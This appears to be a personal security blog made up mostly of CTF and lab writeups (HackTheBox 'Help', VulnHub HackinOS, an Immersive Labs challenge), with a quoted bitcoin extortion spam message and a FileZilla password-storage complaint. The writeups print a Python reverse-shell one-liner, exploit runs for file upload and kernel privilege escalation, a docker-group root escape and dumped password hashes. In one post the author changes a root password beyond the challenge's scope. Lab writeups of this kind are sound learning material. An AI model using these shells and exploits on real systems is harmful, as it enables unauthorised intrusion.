HackTheBox writeup of „Help“

my first writeup for a hackthebox.eu machine called: Help,

$ nmap -Pn –script vuln
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-11 13:22 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for
Host is up (0.041s latency).
Not shown: 997 closed ports
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /support/:
|_ httponly flag not set
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
| http-enum:
|_ /support/: Potentially interesting folder
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
3000/tcp open ppp fileupload through a helpdeskz installation


/*submit_ticket_controller.php – Line 141*
$filename = md5($_FILES[‚attachment‘][’name‘].time()).“.“.$ext;

files uploaded get get obfuscated similar to HackinOS (Vulnhub) md5 of the filname and current time.

unfortunately .php files arent allowed on the machine. too bad. tried nullbyte filenames cmd.gif^@.php etc. no luck. ah ok it seems gifs are not allowed

at least https://packetstormsecurity.com/files/138548/helpdeskz-shell.txt taught me how i could have improved my script for hackinOS.

https://vulners.com/zdt/1337DAY-ID-26838 filedownload looks promising

ok as my colleauges from link protect suggested i tried again to upload a php file and not get confused by error messages. i tried, still no luck, but then i played around with the exploit script und looked at the original helpdeskz and realized that the exploit didnt add the proper upload directory and i had to point it myself…doh, it instantly worked:

$ python hackthebox/help_expl.py ja.gif0x00.php
Helpdeskz v1.0.2 – Unauthenticated shell upload exploit


GIF89a; root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false help:x:1000:1000:help,,,:/home/help:/bin/bash sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false Debian-exim:x:110:118::/var/spool/exim4:/bin/false

i’ve got RCE 🙂

i tried a few reverse shells, a python one python -c ‚import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((„“,2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([„/bin/sh“,“-i“]);‘

got shell 🙂

tty upgrade python -c ‚import pty; pty.spawn(„/bin/bash“)‘
python -c ‚import pty; pty.spawn(„/bin/dash“)‘

also help@help:/home/help$ whoami

user 🙂

enumerating i found
$ cat /var/www/html/support/includes/config.php
show databases;
show databases;
| Database |
| information_schema |
| mysql |
| performance_schema |
| support |
| sys |
5 rows in set (0.00 sec)

use support;

mysql> SELECT * FROM users;
SELECT * FROM users;
| id | salutation | fullname | email | password | timezone | status |
| 1 | 0 | helpme | helpme@helpme.com | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1 |
| 53 | 0 | Foo Bar | foo@bar.nul | 439d32d3c8e4170db7c2bd3dce1ba29c0cec11b4 | NULL | 1 |
53 rows in set (0.00 sec)

| 1 | 0 | helpme | helpme@helpme.com | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian/Christmas | 1 |

c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca sha1 godhelpmeplz
5d3c93182bb20f07b994a7f617e99cff md5 godhelpmeplz

we got a passwd for the helpdeskz

with cat <<EOF < enum.sh
script here

i could manage to get my enumeration script on the box without having a real tty. to remember! after enum, i started looking for priv esc exploits for the configuration i found some exploits for the kernel version.

Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018

after trying a few i found this one working https://www.exploit-db.com/exploits/45010

$ gcc bx.c -o bx

[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800369add00
[*] Leaking sock struct from ffff88000622a400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003aa15680
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003aa15680
[*] credentials patched, launching shell…

# cat /root/root.txt
cat /root/root.txt

# whoami


Spam wave threatening Website Owners

It seems there is a massive spam campaign going on originating from this ip: https://www.shodan.io/host/ and regarding to this guy also and

Spam comments get placed on wordpress websites, featuring a pretty threatening text, at least for people who have monetary interest in their websites.

Hey. Soon your hosting account and your domain unordnung.net will be blocked forever, and you will receive tens of thousands of negative feedback from angry people.

Pay me 0.5 BTC until June 1, 2019.
Otherwise, you will get the reputation of a malicious spammer, your site unordnung.net will be blocked for life and you will be sued for insulting believers. I guarantee this to you.

My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL

Here is a list of what you get if you don’t follow my requirements:
+ abuse spamhouse for aggressive web spam
+ tens of thousands of negative reviews about you and your website from angry people for aggressive web and email spam
+ lifetime blocking of your hosting account for aggressive web and email spam
+ lifetime blocking of your domain for aggressive web and email spam
+ Thousands of angry complaints from angry people will come to your mail and messengers for sending you a lot of spam
+ complete destruction of your reputation and loss of clients forever
+ for a full recovery from the damage you need tens of thousands of dollars

All of the above will result in blocking your domain and hosting account for life. The price of your peace of mind is 0.5 BTC.

Do you want this?

If you do not want the above problems, then before June 1, 2019, you need to send me 0.5 BTC to my Bitcoin wallet: 19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL

How do I do all this to get this result:
1. I will send messages to 33 000 000 sites with contact forms with offensive messages with the address of your site, that is, in this situation, you and the spammer and insult people.
And everyone will not care that it is not you.
2. I’ll send messages to 19,000,000 email addresses and very intrusive advertisements for making money and offer a free iPhone with your website address unordnung.net and your contact details.
And then send out abusive messages with the address of your site.
3. I will do aggressive spam on blogs, forums and other sites (in my database there are 35 978 370 sites and 315 900 sites from which you will definitely get a huge amount of abuse) of your site unordnung.net.
After such spam, the spamhouse will turn its attention on you and after several abuses your host will be forced to block your account for life.
Your domain registrar will also block your domain permanently.

All of the above will result in blocking your domain and hosting account for life.
If you do not want to receive thousands of complaints from users and your hosting provider, then pay before June 1, 2019.
The price of your peace of mind is 0.5 BTC.
Otherwise, I will send your site through tens of millions of sites that will lead to the blocking of your site for life and you will lose everything and your reputation as well.
But get a reputation as a malicious spammer.

My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL

A quick search shows that a lot of websites got those comments.

Seehofer -.-

Angriff auf WhatsApp & Co.: Seehofer will Messenger zur Entschlüsselung zwingen

heise online – https://heise.de/-4431634

Alle bitte mal die CSU ganz dringend abwählen.

Aber ist ja nichts neues, seit 2001 sind die Menschenrechte auf dem absteigenden Ast. Wann bekommen wir eigentlich endlich ein Social Scoring System wie in China? Müssen sich die Dystopien in so rasantem Tempo realisieren?

Am Sonntag Liebe und Freiheit wählen bitte <3

filezilla stores passwords in (almost) plain text

When importing my sitemanager.xml from my windows filezilla to my linux box i discovered that the passwords in it are store in base64 encoding completely unencrypted. This is sucks, because i use a master password to, what i thought, encrypt my passwords with it.

        <Pass encoding="base64">base64 encoded password</Pass>

So what is the master password for? Etablishing a wrong sense of safety? doh. https://stackoverflow.com/questions/29790136/filezilla-plain-text-password shows us that filezilla is doing it that way for years already.


inurl:“sitemanager.xml“ ext:xml -git

DON’T store your passwords in filezilla.

vulnhub hackingOS writeup


running sparta gave me port 22 and 8000, on 8000 i found a defunct wordpress. which pointed to localhost, that could be fixed with locally assigning localhost to the vm’s network ip.

i also found that Handsome_Container was a valid wordpress username. i started bruteforcing it with burp suite.

nikto revealed some interesting infos:

– Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port: 8000
+ Start Time: 2019-05-01 14:55:20 (GMT2)
+ Server: Apache/2.4.25 (Debian)
+ Retrieved x-powered-by header: PHP/7.2.15
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to:
+ No CGI Directories found (use ‚-C all‘ to force check all possible dirs)
+ Entry ‚/upload.php‘ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ „robots.txt“ contains 2 entries which should be manually viewed.
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header ‚link‘ found, with contents: ; rel=“https://api.w.org/“
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/hello.php: PHP error reveals file system path.
+ OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ 7919 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2019-05-01 14:56:56 (GMT2) (96 seconds)
+ 1 host(s) tested

the /upload.php is interesting, its an image upload function. i started uploading with php reverse shells infected png images. That didnt work out.

Warning: getimagesize(): PNG file corrupted by ASCII conversion in /var/www/html/upload.php on line 25

At some point i found the hint hidden in the html code <– https://github.com/fatihhcelik/Vulnerable-Machine—Hint –>
That revealed the upload.php’s code:

That makes it a lot easier. We can see that the file ist renamed to the md5 of the filename and a random number from 1-100.
The script checks the mime type of the uploaded file but no extension, allowed are gif and png mime types.

So i created a random png image with gimp and opened it with hex editor, put a a php reverse shell in it. upload wont work -.- after learning and experimenting i found a gif working like that:

cat cmd.php

now we get to launch the shell and for that we need to find the uploaded file, so i wrote a script to create the 100 possible hashes of cmd.phpXXX


import hashlib

textToEncode = input()
bisHundert = 1
toEncode = textToEncode+str(bisHundert)

while bisHundert<=100:
bisHundert += 1
toEncode = textToEncode+str(bisHundert)

$ python3 md5hackinOS_ctf.py > cmdphphashes.txt
thomsane@anansi:~/python$ cat cmdphphashes.txt

now we can supply wfuzz with the payloads stored in the textfile.

$ sudo wfuzz -w python/cmdphphashes.txt –hc 404

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz’s documentation for more information.

* Wfuzz 2.3.4 – The Web Fuzzer *

Total requests: 100

ID Response Lines Word Chars Payload

000024: C=200 3 L 16 W 165 Ch „39b07a3be178f1249b64f60105360c4b“

Total time: 0.245449
Processed Requests: 100
Filtered Requests: 99
Requests/sec.: 407.4165

and it found our „picture“ at

and my listener received the shell 🙂 which i upgraded to a real tty with python -c ‚import pty; pty.spawn(„/bin/bash“)‘ and started looking for priv esc possibilities.

i found /usr/bin/tail to have SUID bit set and tried to:
$ tail -n 100 /root/flag
Life consists of details..

well, thats not a flag right? but no permission error either since cat: /root/flag: Permission denied

tail -c1G /etc/shadow

enumerating further i found $ cat /etc/init.d/delete.sh
cat /etc/init.d/delete.sh

while [ 1 ]
rm -rf /var/www/html/uploads/*.php
sleep 300

okay…that was the fuck keeping burp suite intruder from finding the file because of the speed throtteling in the free edition. -.-

cat wp-config.php

LOCK TABLES `host_ssh_cred` WRITE;
/*!40000 ALTER TABLE `host_ssh_cred` DISABLE KEYS */;
INSERT INTO `host_ssh_cred` VALUES (‚hummingbirdscyber‘,’e10adc3949ba59abbe56e057f20f883e‘);
/*!40000 ALTER TABLE `host_ssh_cred` ENABLE KEYS */;

INSERT INTO `wp_users` VALUES (1,’Handsome_Container‘,’$P$BXJ8ZmtYd5lHZOLPgTccLUhaQLxm0L0′,’handsome_container‘,’pupetofosu@ask-mail.com‘,“,’2019-02-23 15:49:54′,“,0,’Handsome_Container‘);

e10adc3949ba59abbe56e057f20f883e md5 of 123456

well, well, well…i was on a container before! i noticed when i looked in /var/www/html and only found an index.html. i was thinking so when i was looking on the mounts on the container…

[+] Current User

[+] Current User ID
uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)

ok, we are in the docker group…so basically root already.

lets look what containers run

hummingbirdscyber@vulnvm:~$ docker ps
252fa8cb1646 ubuntu "/bin/bash" 2 months ago Up 2 days brave_edison
1afdd1f6b82c wordpress:latest "docker-entrypoint.s…" 2 months ago Up 2 days>80/tcp experimental_wordpress_1
81a93420fd22 mysql:5.7 "docker-entrypoint.s…" 2 months ago Up 2 days 3306/tcp, 33060/tcp experimental_db_1

since i run the vulnerable vm without internet access for security reasons, i used the ubuntu image which already exists to elevate my privileges

hummingbirdscyber@vulnvm:~$ docker run -v /:/hostOS -i -t ubuntu

now we run a a new container and the / filesystem of the main host is mounted to /hostOS

root@c50ed36b8d25:/hostOS/root# cat flag


                                 `+mMMMMMMd/           ./oso/-                           
                                  `/yNMMMMMMMMNo`   .`   +-                   
                                  .oyhMMMMMMMMMMN/.     o.                  
                                    `:+osysyhddhs`    `o`                  
                                     .:oyyhshMMMh.   .:                      
                                  `-//:. `:sshdh: `                         
                                      /+. .d`                           
                                    -/`  `y`                                  
                                  `:`   `/                                    
                                 `.     `

that was fun 🙂 <3


Browsing Reddit I stumbled upon an article about Kevin Mitnick and what he’s doing nowadays. Since I’m still remembering the websites wearing orange free Kevin banners back in the days, I was pretty curious.

Its awesome to see that he runs a very successful cybersec company.

„Mitnick said he initially became a computer hacker because he loved magic.“

I love this anecdote. That’s pretty much the reason I’m interested in netsec as well. More because of fantasy novel magery and Ultima Online kind of than Houdini or alikes.

Should have started earlier to get into netsec myself, it’s still awesome fun but its not as mystified as before I got myself digging deeper in IT security.

i played in utctf

239 of 581^^

was quite a fun and my first ctf event. i had much rl stuff goin on during the 2 days, might have been better when i had more time. im looking forward to see some writeups for the ones i tried and didnt solve.


immune hacking group writeup

This is a quick writeup of the challenge https://immersivelabs.online/labs/cyber-warrior-immune-hacking-group which was funny 🙂

In this warrior challenge you’ll need to follow the breadcrumbs to infiltrate an underground hacking community. You can find the community at their website, immunehackinggroup.tk – from here its all on you. 

i found the first flag in the source code of their webpage

<!--Tm90ZSB0byBhZG1pbnM6IHVzZSB0aGUgdXN1YWwgcm90YXRpb24gY2lwaGVyIHRvIGFjY2VzcyBvdXIgZGFyayBuZXQgc2l0ZTogYm5uajovLzdjcjR0cGdobXdxNmcybXguaWhjaWgv RkxBRzogMWI1MDRkMzMyOGUxNmZkZjI4MWQxZmI5NTE2ZGQ5MGI=--><br/> <!--FLAG: f447b20a7fcbf53a5d5be013ea0b15af--></p>

i decoded the base64 encoded text getting:

Note to admins: use the usual rotation cipher to access our dark net site: bnnj://7cr4tpghmwxxxxxxxxx

with the help of https://www.dcode.fr/rot-cipher i decoded the rotation cipher getting:


on their darknet page i found another flag and a ssh key:

FAO Admins: We’ve not included the servername required for the full connection.

<secret>.immunehackinggroup.tkxx password

 FLAG: 827ccb0eea8a706c4c34a16891f84e7b


They sent me a lion, but he was too FIERCE. So they send me a TXT record, it was perfect!  

so i looked at the dns entries of their domain and found a flag

dnsrecon -d immunehackinggroup.tk

[] A immunehackinggroup.tk [] A immunehackinggroup.tk
[] TXT immunehackinggroup.tk FLAG:25d55ad283aa400af464c76d713c07ad [] Enumerating SRV Records
[-] No SRV Records Found for immunehackinggroup.tk
[+] 0 Records Found

with robtex.com i found the FQDN of the ssh server


FQDN hidden.immunehackinggroup.tk
Host Name hidden
Domain Name immunehackinggroup.tk
Registry tk
TLD tk
IP numbers

with the ssh key and credentials found on the onion site i log into ssh and found a flag
ubuntu@ip-172-31-45-227:~$ cat /home/ubuntu/flag.txt

which was the final flag for the objective. but i decided to go further and enumerate the system. there is a lot of eveidence that other ppl tried to elevate privileges with exploits. luckily i was able to wget LinEnum.sh and found a lot, so i didnt need to use exploits at all

ubuntu@ip-172-31-45-227:~$ sudo cat /root/flag.txt

sudo was enabled for user ubuntu w/o password ^^ enum is the key 😛 so i found another flag in /root and another in /root/contacts/membership

ubuntu@ip-172-31-45-227:~$ sudo cat /root/contacts/membership

NOW it gets funny:

ubuntu@ip-172-31-45-227:~$ sudo cat /home/ubuntu/README
We recently had some issues with accounts, and we had to reset the root password of Your account to a randomly generated one It’s recommended to change the password for security reasons Current root password: xxxxx Sorry for the incovenience, the Amazon Team

root@ip-172-31-45-227:/home/ubuntu# whoami


root@ip-172-31-45-227:/home/ubuntu# echo „hi, send me some extra points i got way more flags 🙂 btw i love your virtual labs, but i dunno if i meant to get root on this machine, for security reasons i change the root passwd 😉 contact me at xxx@unordnung.net if thats not part of the challenge immunehackinggroup.“ | mail -s „hi. might be an incident“ enquiries@immersivelabs.com
root@ip-172-31-45-227:/home/ubuntu# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully


you got mail immersivelabs, thx for the fun 🙂
root@ip-172-31-45-227:/home/ubuntu# exit

so…what now? breaking out of kvm? (is that still the ctf or am i hacking aws then? 🙂 installing miners?

im a newbie as you might’ve already guessed.